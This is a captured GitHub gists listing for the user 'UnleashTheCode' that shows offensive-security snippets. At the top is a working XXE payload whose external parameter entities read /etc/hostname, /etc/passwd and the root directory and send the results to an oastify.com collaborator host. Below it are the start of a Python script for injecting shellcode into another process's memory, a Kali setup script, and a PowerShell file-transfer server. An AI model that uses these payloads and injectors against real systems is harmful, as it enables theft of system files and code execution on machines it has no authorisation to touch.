Skip to content

Instantly share code, notes, and snippets.

View UnleashTheCode's full-sized avatar
😎

UnleashTheCode

😎
  • Data Core Systems
  • Romania
View GitHub Profile
<!ENTITY % fileW SYSTEM "file:///etc/hostname">
<!ENTITY % fileL SYSTEM "file:///etc/passwd">
<!ENTITY % fileZ SYSTEM "file:///">
<!ENTITY % fileE SYSTEM "file://asdasdin/a">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileW;'>">
<!ENTITY % evalq "<!ENTITY &#x25; exfiltrateq SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileL;'>">
<!ENTITY % evala "<!ENTITY &#x25; exfiltratea SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>">
<!ENTITY % evale "<!ENTITY &#x25; exfiltratee SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>">
%eval;
@UnleashTheCode
UnleashTheCode / pimp.sh
Last active January 25, 2024 01:52
A scripts to improve the quality of life on your kali
#!/bin/bash
ls ~/.zshrc_copy || cp ~/.zshrc ~/.zshrc_copy
# Abort on errors
set -e
# Function to install a package only if it's not already installed
function install_if_needed() {
local pkg="$1"
if ! dpkg -l "$pkg" &>/dev/null ; then
@UnleashTheCode
UnleashTheCode / RPI.py
Created March 9, 2023 12:39
A Remote Code Injector written in Python
# Remote Process Memory Injection
# Doesn't work on every program
# Tested with .NET programs (EarTrumpet, Greenshot)
import sys
from ctypes import *
import psutil
shellCode = b"Shell_code_here"
@UnleashTheCode
UnleashTheCode / shs.ps1
Last active February 28, 2023 14:59
Simple HTTP Server Powershell for file transfer
param ($DPath, $DPort)
if (!$DPath)
{
$DPath = '.'
}
if (!$DPort)
{
$DPort = '4444'